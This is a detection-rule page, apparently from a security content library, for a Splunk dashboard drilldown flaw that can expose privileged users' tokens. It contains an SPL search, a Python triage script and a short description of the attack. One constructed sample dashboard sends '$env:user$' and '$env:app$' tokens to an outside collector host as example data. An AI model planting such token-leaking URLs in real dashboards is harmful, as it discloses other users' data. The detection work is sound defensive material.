Techniques
Sample rules
Splunk Account Discovery Drilldown Dashboard Disclosure
- source: splunk
- techniques:
- T1087
Description
A drilldown vulnerability in the Splunk Dashboard application can potentially expose tokens belonging to privileged users. An attacker can create a dashboard, share it with a privileged user (admin), and detokenize variables using external URLs within the dashboard's drilldown function.
Detection logic
| rest splunk_server=local /servicesNS/-/-/data/ui/views
| search eai:data="*$env:*" eai:data="*url*" eai:data="*options*"
| rename author AS Author eai:acl.sharing AS Permissions eai:appName AS App eai:data AS "Dashboard XML"
| fields Author Permissions App "Dashboard XML"
| `splunk_account_discovery_drilldown_dashboard_disclosure_filter`
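The search above returns every dashboard whose source contains `$env:`, `url` and `options` anywhere, so its results need triage. The following Python is an added example, not part of the original rule: it narrows exported results to dashboards where an `$env:...$` token sits inside a URL whose host is outside an allowlist. The `trusted_hosts` allowlist, the function names and the sample rows are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"'<>]+")         # absolute URLs in XML or JSON source
ENV_TOKEN_RE = re.compile(r"\$env:[A-Za-z0-9_]+\$")  # environment tokens such as $env:user$

def external_env_urls(source, trusted_hosts=frozenset()):
    """Return (host, tokens) for each URL that embeds an $env:...$ token
    and whose host is not in trusted_hosts (an assumed, site-specific allowlist)."""
    findings = []
    for url in URL_RE.findall(source):
        tokens = sorted(set(ENV_TOKEN_RE.findall(url)))
        host = (urlsplit(url).hostname or "").lower()
        if tokens and host not in trusted_hosts:
            findings.append((host, tokens))
    return findings

def triage(rows, trusted_hosts=frozenset()):
    """rows: dicts with the Author, App and "Dashboard XML" fields the search returns."""
    hits = []
    for row in rows:
        for host, tokens in external_env_urls(row["Dashboard XML"], trusted_hosts):
            hits.append((row["Author"], row["App"], host, tokens))
    return hits

# Constructed sample rows; the dashboard bodies are illustrative, not from a real instance.
SAMPLE_ROWS = [
    {"Author": "alice", "App": "search",  # matches the wildcards, but no token is in a URL
     "Dashboard XML": '<dashboard version="2"><label>Hello $env:user$</label><definition>'
                      '<![CDATA[{"options": {"url": "https://docs.example.com/help"}}]]>'
                      '</definition></dashboard>'},
    {"Author": "carol", "App": "search",  # tokens placed in a URL on a host not in the allowlist
     "Dashboard XML": '<dashboard version="2"><definition><![CDATA[{"options": {"url": '
                      '"https://collector.example.net/c?u=$env:user$&a=$env:app$"}}]]>'
                      '</definition></dashboard>'},
    {"Author": "bob", "App": "itops",     # token sent to a host the organisation trusts
     "Dashboard XML": '<dashboard version="2"><definition><![CDATA[{"options": {"url": '
                      '"https://wiki.corp.example/page?user=$env:user$"}}]]>'
                      '</definition></dashboard>'},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_ROWS, trusted_hosts={"wiki.corp.example"}):
        print(hit)
```

With an empty allowlist every URL that carries an environment token is reported, which is the safer starting point until the set of trusted hosts is known.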